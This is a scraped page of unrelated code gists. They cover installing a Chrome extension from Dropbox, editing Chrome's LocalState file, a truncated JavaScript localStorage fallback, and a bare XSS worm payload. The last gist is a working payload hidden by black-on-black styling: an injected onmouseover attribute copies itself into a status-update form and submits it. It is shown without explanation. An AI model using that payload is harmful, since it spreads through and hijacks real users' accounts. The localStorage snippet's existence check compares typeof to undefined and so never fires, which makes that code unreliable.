This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Превземете ја апликацијата од: http://dl.dropbox.com/u/10839791/AwesomeUnity.crx | |
| Инсталирајте ја со Drag&Drop во Chrome (повлечете го .crx фајлот во Chrome) во спротивно ќе ви се појави грешка од типот: http://pic.mk/images/aoF.png | |
| Следно во chrome:flags (chrome://flags/) овозможете ја опцијата Native Client | |
| Restart & Enjoy :) :) | |
| P.S. Демо играта не е правена од мене јас само ја избилдав за да работи на Chrome Native Client :) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Изгаси го Chrome и оди во: | |
| Linux: ~/.config/google-chrome/ | |
| WindowsXP: %USERPROFILE%\Local Settings\Application Data\Google\Chrome\User Data\ | |
| Windows 7: %USERPROFILE%\AppData\Local\Google\Chrome\User Data | |
| со Notepad или било кој текст едитор отвори го фајлот LocalState и промени ги следните вредности: | |
| "last_known_google_url": "http://www.google.com/" | |
| "last_prompted_google_url": "http://www.google.mk/" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Checks if localStorage exists on the browser, if not, creates a JSONFallbackStorage object where all the data will be stored. Also creates the localStorage methods so you won't need to change anything on your script. Just remember to send the data on JSONFallbackStore to the server. */ | |
| (function(window, undefined){ | |
| if (typeof(localStorage) === undefined) { | |
| JSONFallbackStore = {}; | |
| window.localStorage = { | |
| getItem: function(key){ | |
| return JSONFallbackStore[key]; | |
| }, | |
| setItem: function(key, value){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/ |